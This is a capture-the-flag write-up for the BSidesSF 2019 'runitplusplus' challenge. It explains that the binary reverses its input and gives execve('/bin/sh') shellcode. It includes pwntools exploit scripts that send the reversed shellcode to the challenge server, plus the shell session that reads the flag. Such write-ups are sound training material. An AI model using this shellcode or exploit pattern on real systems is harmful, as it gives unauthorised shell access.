[Pwn] BsidesSF 2019 - runitplusplus

runitplusplus 52

Description:
This is the same as runit, except requires a bit of reversing! Grab the flag from /home/ctf/flag.txt

Location - runitplusplus-a36bf652.challenges.bsidessf.net:5353

runitplusplus

As the description says this is the same as the runit challenge but with a bit of reversing:

The shell code I used for this was \x31\xC0\x31\xD2\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80, if we use this website to check what this shellcode does:

Everything looks right we are clearing EAX and EDX in the beginning, we are pushing the bin/sh string into the stack and put its address ECX the EDX must be zero because it’s the envp argument and EAX is 0xb which is the execve system call number, so now we just need to reverse this shell code, we can use python to do that in my case I used [::-1] which reverses the string:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *

host = 'runitplusplus-a36bf652.challenges.bsidessf.net'
port = 5353
local = True
filename = 'runitplusplus'
def getConn():
#d = os.environ
#d['LD_PRELOAD'] = './libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253'
return process(filename) if local else remote(host, port)

SHELLCODE = '\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80'[::-1]
r = getConn()
gdb.attach(r, '''
b *0x8048680
c
''')
print r.recv()
r.sendline(SHELLCODE)
r.interactive()

So lets put a break point right on the address 0x8048680 which is right before the program does CALL EAX and do a step in and lets what what happened to the shell code after running that for loop:

So to circumvent this what I did is to repeat the first 4 bytes of my shell code which was the code for xor eax,eax and xor edx,edx:

So we need to add this to our original shell code and we get this \x31\xC0\x31\xD2\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80 which in assembly is:

So lets check how it looks in gdb with the breakpoint:

Now that everything is fine we are ready to run the script on the server:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *

host = 'runitplusplus-a36bf652.challenges.bsidessf.net'
port = 5353
local = False
filename = 'runitplusplus'
def getConn():
#d = os.environ
#d['LD_PRELOAD'] = './libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253'
return process(filename) if local else remote(host, port)

SHELLCODE = '\x31\xC0\x31\xD2\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80'[::-1]
r = getConn()
#gdb.attach(r, '''
# b *0x8048680
# c
# ''')
print r.recv()
r.sendline(SHELLCODE)
r.interactive()

Now running it:

1
2
3
4
5
6
7
8
9
10
11
12
$ python runitplusplus.py 
[+] Opening connection to runitplusplus-a36bf652.challenges.bsidessf.net on port 5353: Done
Send me stuff!!
[*] Switching to interactive mode

$ cat home/ctf/flag.txt
{ti_nar_uoy}FTC
[*] Got EOF while reading in interactive
$
$
[*] Closed connection to runitplusplus-a36bf652.challenges.bsidessf.net port 5353
[*] Got EOF while sending in interactive

The flag was {ti_nar_uoy}FTC